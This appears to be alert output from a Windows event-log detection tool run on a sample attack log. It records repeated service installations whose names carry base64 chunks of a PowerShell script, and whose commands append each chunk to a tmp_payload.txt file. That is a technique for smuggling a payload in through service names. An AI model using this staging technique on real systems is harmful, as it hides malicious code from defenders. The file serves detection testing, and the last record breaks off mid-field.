Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:39.555 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:39.555 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:39.555 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:41.021 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:41.021 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 17:16:41.021 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:42.474 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:42.474 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:42.474 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:43.938 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:43.938 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:43.938 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:45.441 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:45.441 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:45.441 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:46.913 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:46.913 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:46.913 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:48.360 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:48.360 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand 
DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:48.360 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:49.806 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:49.806 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:49.806 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:51.269 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:51.269 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:51.269 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:52.716 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:52.716 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 
BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:52.716 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:54.170 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:54.170 
+09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:54.170 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:55.604 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 17:16:55.604 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:55.604 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:57.053 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 